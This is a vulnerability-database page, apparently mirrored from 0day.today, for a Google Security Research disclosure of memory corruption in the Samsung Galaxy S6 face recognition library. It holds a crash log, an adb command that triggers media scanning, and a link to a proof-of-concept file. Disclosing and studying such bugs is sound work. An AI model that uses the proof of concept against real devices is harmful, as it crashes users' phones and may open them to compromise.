Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine)

🗓️ 08 Feb 2016 00:00:00Reported by Google Security ResearchType 
zdt
 zdt🔗 0day.today👁 21 Views

Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine) Source: 61

Code
Source: https://code.google.com/p/google-security-research/issues/detail?id=616
 
The attached file causes memory corruption when iy is scanned by the face recognition library in android.media.process
 
F/libc    ( 4134): Fatal signal 11 (SIGSEGV), code 1, fault addr 0x33333333333358 in tid 12161 (syncThread)
I/DEBUG   ( 3021): *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
I/DEBUG   ( 3021): Build fingerprint: 'Verizon/zeroltevzw/zeroltevzw:5.1.1/LMY47X/G925VVRU4BOG9:user/release-keys'
I/DEBUG   ( 3021): Revision: '10'
I/DEBUG   ( 3021): ABI: 'arm64'
I/DEBUG   ( 3021): pid: 4134, tid: 12161, name: syncThread  >>> android.process.media <<<
I/DEBUG   ( 3021): signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x33333333333358
I/DEBUG   ( 3021):     x0   3333333333333330  x1   0000007f714b6800  x2   000000000000001f  x3   3333333333333330
I/DEBUG   ( 3021):     x4   0000007f817fedb8  x5   0000007f7c1f4ea8  x6   0000007f7c1f4ec0  x7   0000007f7c109680
I/DEBUG   ( 3021):     x8   304b333333333333  x9   3033330333000000  x10  3333333333333333  x11  0103304b33333333
I/DEBUG   ( 3021):     x12  0000040033300311  x13  0300035033333333  x14  0300303333233333  x15  0000000000001484
I/DEBUG   ( 3021):     x16  0000007f74bfe828  x17  0000007f8c086008  x18  0000007f8c13b830  x19  0000007f7c279a00
I/DEBUG   ( 3021):     x20  0000000000000000  x21  0000007f7c1036a0  x22  0000007f817ff440  x23  0000007f7c279a10
I/DEBUG   ( 3021):     x24  0000000032d231a0  x25  0000000000000065  x26  0000000032d28880  x27  0000000000000065
I/DEBUG   ( 3021):     x28  0000000000000000  x29  0000007f817fecb0  x30  0000007f740be014
I/DEBUG   ( 3021):     sp   0000007f817fecb0  pc   0000007f740cefdc  pstate 0000000080000000
I/DEBUG   ( 3021): 
I/DEBUG   ( 3021): backtrace:
I/DEBUG   ( 3021):     #00 pc 0000000000065fdc  /system/lib64/libfacerecognition.so (MdConvertLine+28)
I/DEBUG   ( 3021):     #01 pc 0000000000055010  /system/lib64/libfacerecognition.so (MCC_Process+160)
 
To reproduce, download the attached file and wait, or trigger media scanning by calling:
 
adb shell am broadcast -a android.intent.action.MEDIA_MOUNTED -d file:///mnt/shell/emulated/0/
 
 
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39425.zip

#  0day.today [2018-03-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
08 Feb 2016 00:00Current
7High risk
Vulners AI Score7
samsung galaxy s6android.media.processface recognitionmemory corruptionmdconvertlinegoogle security research616exploitproof of concept
21